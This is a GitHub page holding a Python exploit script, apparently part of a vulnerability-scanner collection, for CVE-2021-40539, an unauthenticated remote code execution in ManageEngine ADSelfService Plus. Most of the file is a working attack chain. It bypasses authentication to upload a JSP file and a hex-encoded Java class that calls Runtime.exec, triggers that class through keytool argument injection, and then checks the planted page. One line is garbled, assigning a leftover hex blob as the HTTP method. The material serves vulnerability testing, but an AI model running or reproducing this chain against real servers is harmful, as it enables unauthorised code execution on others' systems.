-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-40539.py
144 lines (116 loc) · 6.96 KB
/
CVE-2021-40539.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE''',
"description": '''ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass which leads to remote code execution.''',
"severity": "critical",
"references": [
"https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis",
"https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539",
"https://github.com/synacktiv/CVE-2021-40539"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-40539",
"cwe-id": "CWE-287"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "rce", "ad", "intrusive", "manageengine"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/./RestAPI/LogonCustomization"""
method = "POST"
data = """--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="methodToCall"
unspecified
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="Save"
yes
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="form"
smartcard
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="operation"
Add
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp"
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2021-40539";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
--8b1ab266c41afb773af2e064bc526458--"""
headers = {'Content-Type': 'multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/./RestAPI/LogonCustomization"""
method = "POST"
data = """--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="methodToCall"
unspecified
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="Save"
yes
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="form"
smartcard
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="operation"
Add
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class"
{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}
--43992a07d9a30213782780204a9f032b--"""
headers = {'Content-Type': 'multipart/form-data; boundary=43992a07d9a30213782780204a9f032b'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/./RestAPI/Connection"""
method = "CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015\')}}\n--43992a07d9a30213782780204a9f032b--\n',"
data = """methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/help/admin-guide/test.jsp"""
method = "GET"
data = """"""
headers = {}
resp3 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""114f7ce498a54a1be1de1f1e5731d0ea""" in resp3.text) and (resp3.status_code == 200):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url